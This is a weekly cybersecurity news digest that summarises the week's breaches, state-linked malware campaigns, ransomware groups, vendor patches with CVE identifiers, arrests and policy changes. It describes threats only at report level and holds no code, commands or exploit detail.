Week that Was for 09.14.24

At a glance.

• Fortinet confirms breach of customer data.
• Iran's Scarred Manticore deploys new malware across the Middle East.
• Earth Preta targets government entities in the Asia-Pacific.
• DragonRank manipulates SEO to promote scam sites.
• NoName partners with RansomHub.
• New RaaS operation is recruiting criminal affiliates.
• Patch news.

Fortinet confirms breach of customer data.

Cybersecurity firm Fortinet has confirmed that it sustained a data breach affecting some customer data, BleepingComputer reports. The company stated, "An individual gained unauthorized access to a limited number of files stored on Fortinet’s instance of a third-party cloud-based shared file drive, which included limited data related to a small number (less than 0.3%) of Fortinet customers." The company hasn't disclosed what type of data was stolen, but says it has "communicated directly with customers as appropriate."

BleepingComputer notes that a threat actor posted on a hacking forum yesterday claiming to have stolen 440 GB of data from Fortinet's Azure Sharepoint instance. The crook also posted credentials to an S3 bucket containing the alleged stolen data, stating that Fortinet refused to pay a ransom to prevent the data from being leaked. BleepingComputer hasn't confirmed the validity of the threat actor's claims.

Iran's Scarred Manticore deploys new malware across the Middle East.

Check Point has published a report on a cyberespionage campaign by Scarred Manticore, a threat actor affiliated with Iran's Ministry of Intelligence and Security (MOIS). The threat actor is using a new malware framework dubbed "LIONTAIL" to target the government, telecommunications, military, and financial sectors in Saudi Arabia, the UAE, Jordan, Kuwait, Oman, Iraq, and Israel.

Check Point states, "LIONTAIL is a malware framework that includes a set of custom shellcode loaders and memory resident shellcode payloads. One of its components is the LIONTAIL backdoor, written in C. It is a lightweight but rather sophisticated passive backdoor installed on Windows servers that enables attackers to execute commands remotely through HTTP requests. The backdoor sets up listeners for the list of URLs provided in its configuration and executes payloads from requests sent by attackers to those URLs."

While the goal of this campaign is espionage, the researchers note that some of the same tools were used in an MOIS-sponsored destructive cyberattack against the Albanian government in 2022.

Earth Preta targets government entities in the Asia-Pacific.

Trend Micro is tracking new variants of malware used by the China-aligned threat actor Earth Preta (also known as "Mustang Panda"). The threat actor is using spearphishing emails and removable drives to deploy malware against government entities in the Asia-Pacific region. Trend Micro states, "Earth Preta employed a variant of the worm HIUPAN to propagate PUBLOAD into their targets' networks via removable drives. PUBLOAD was used as the main control tool for most of the campaign and to perform various tasks, including the execution of tools such as RAR for collection and curl for data exfiltration. PUBLOAD was also used to introduce supplemental tools into the targets' environment, such as FDMTP to serve as a secondary control tool, which was observed to perform similar tasks as that of PUBLOAD; and PTSOCKET, a tool used as an alternative exfiltration option."

DragonRank manipulates SEO to promote scam sites.

Cisco Talos has published a report on "DragonRank," a Chinese-speaking hacking group focused on SEO manipulation. The researchers state, "The hacking group’s primary goal is to compromise Windows Internet Information Services (IIS) servers hosting corporate websites, with the intention of implanting the BadIIS malware. BadIIS is a malware used to manipulate search engine crawlers and disrupt the SEO of the affected sites. With those compromised IIS servers, DragonRank can distribute the scam website to unsuspecting users."

NoName partners with RansomHub.

The NoName ransomware gang appears to be working as an affiliate for the RansomHub ransomware-as-a-service operation, BleepingComputer reports. ESET, which tracks NoName as "CosmicBeetle," says the group is also using its own strain of ransomware dubbed "ScRansom." ESET notes, "ScRansom is not very sophisticated ransomware, yet CosmicBeetle has been able to compromise interesting targets and cause great harm to them." The researchers add that since the ScRansom malware is buggy, victims who decide to pay the ransom should be prepared to deal with complications and potential loss of data during the decryption process.

New RaaS operation is recruiting criminal affiliates.

Palo Alto Networks' Unit 42 has published a report on Repellent Scorpius, a ransomware-as-a-service operation that surfaced in May 2024. The group distributes the Cicada3301 ransomware and conducts double-extortion attacks by exfiltrating data before deploying the ransomware. The researchers state, "Unit 42 has evidence to suggest that the Repellent Scorpius operators have developed a RaaS affiliate program. It operates a control panel for affiliates and ransom payment pages for victims, and actively recruits initial access brokers (IAB) and network intruders on Russian-language cybercrime forums."

Patch news.

Progress Software has issued an emergency patch for a maximum severity remote code execution vulnerability (CVE-2024-7591) affecting all LoadMaster releases and LoadMaster Multi-Tenant hypervisor products, BleepingComputer reports. Progress stated, "It is possible for unauthenticated, remote attackers who have access to the management interface of LoadMaster to issue a carefully crafted http request that will allow arbitrary system commands to be executed. This vulnerability has been closed by sanitizing request user input to mitigate arbitrary system commands execution."

Veeam has patched a critical unauthenticated remote code execution flaw affecting its Backup & Replication software, HackRead reports. The flaw has been assigned a CVSS score of 9.8. Researchers at Censys said in a report on the vulnerability, "CVE-2024-40711 could allow an attacker to gain full control of a system, manipulate data, and potentially move laterally within a network, making it a relatively high-value target for threat actors. This vulnerability is particularly concerning because it’s likely to be exploited by ransomware operators to compromise backup systems and potentially create double-extortion scenarios."

Microsoft on Patch Tuesday issued fixes for 79 vulnerabilities, including four actively exploited zero-days, Dark Reading reports. Two of the zero-days (CVE-2024-38226 and CVE-2024-38217) are security bypass vulnerabilities that can be exploited via social engineering. Dark Reading quotes Satnam Narang, senior staff research engineer at Tenable, as saying, "Exploitation of both CVE-2024-38226 and CVE-2024-38217 can lead to the bypass of important security features that block Microsoft Office macros from running." A third zero-day (CVE-2024-38014) is an elevation of privilege flaw affecting Windows Installer that can allow an attacker to gain SYSTEM privileges. The fourth zero-day is a remote code execution vulnerability in the Servicing Stack that's been assigned a CVSS score of 9.8. This vulnerability can allow an attacker to roll back fixes for previously patched flaws in Windows 10, version 1507.

Ivanti has patched a maximum severity remote code execution vulnerability (CVE-2024-29847) affecting its Endpoint Management software, BleepingComputer reports. The company stated, "Deserialization of untrusted data in the agent portal of Ivanti EPM before 2022 SU6, or the 2024 September update allows a remote unauthenticated attacker to achieve remote code execution."

Adobe has released security patches for multiple products, including Acrobat and Reader, Photoshop, ColdFusion, Illustrator, and After Effects, BeyondMachines reports.

SecurityWeek has a summary of patches issued by ICS vendors, including Siemens, Schneider Electric, and ABB. The US Cybersecurity and Infrastructure Security Agency (CISA) has also issued four ICS advisories.

Crime and punishment.

The US Department of the Treasury’s Office of Foreign Assets Control (OFAC) has sanctioned Cambodian businessman and senator Ly Yong Phat for his alleged involvement in "serious human rights abuse related to the treatment of trafficked workers subjected to forced labor in online scam centers." OFAC alleges that Ly owns a resort that's used as a scam center, with human trafficking victims forced to carry out online scam operations. Treasury states, "For more than two years, from 2022 to 2024, O-Smach Resort has been investigated by police and publicly reported on for extensive and systemic serious human rights abuse. Victims reported being lured to O-Smach Resort with false employment opportunities, having their phones and passports confiscated upon arrival, and being forced to work scam operations. People who called for help reported being beaten, abused with electric shocks, made to pay a hefty ransom, or threatened with being sold to other online scam gangs."

The UK's National Crime Agency has arrested a British teenager in connection with a cyberattack that hit Transport for London (TfL) last week, the Record reports. TfL, the government body responsible for London's transport network, says it's still dealing with limited disruptions and some customer data has been breached. The NCA disclosed that a 17-year-old male was detained on Computer Misuse Act offenses and has since been released on bail. The Register reports that the breach may have affected financial information belonging to around 5,000 customers. TfL is also bringing in all 30,000 employees to do in-person password resets.

A New York City man, Vitalii Antonenko, has pleaded guilty to conspiracies to engage in computer hacking, trafficking in stolen payment card numbers, and money laundering, the US Justice Department says. Antonenko was arrested at JFK Airport in March 2019 after arriving on a flight from Ukraine "carrying computers and other digital media that held hundreds of thousands of stolen payment card numbers." The Justice Department says "Antonenko and co-conspirators scoured the internet for computer networks with security vulnerabilities that were likely to contain credit and debit card account numbers, expiration dates, and card verification values (Payment Card Data), and other personally identifiable information (PII)."

Courts and torts.

Pennsylvania healthcare provider Lehigh Valley Health Network (LVHN) will pay $65 million to settle a class-action lawsuit filed over a ransomware-related data breach, SecurityWeek reports. Hackers affiliated with the BlackCat/ALPHV ransomware operation breached LVHN last year and stole personal, medical, and financial information belonging to patients. The stolen data included nude medical images of patients, some of which were posted to BlackCat's leak site. As part of the settlement, patients whose nude photos were leaked will receive up to $70,000.

Policies, procurements, and agency equities.

UK Technology Secretary Peter Kyle announced Thursday that the United Kingdom will designate data centers as critical national infrastructure, Industrial Cyber reports. Kyle said in a statement, "Putting data centres on an equal footing as water, energy and emergency services systems will mean the data centres sector can now expect greater government support in recovering from and anticipating critical incidents, giving the industry greater reassurance when setting up business in UK and helping generate economic growth for all." Additionally, the designation will "see the setting up of a dedicated CNI data infrastructure team of senior government officials who will monitor and anticipate potential threats, provide prioritised access to security agencies including the National Cyber Security Centre, and coordinate access to emergency services should an incident occur."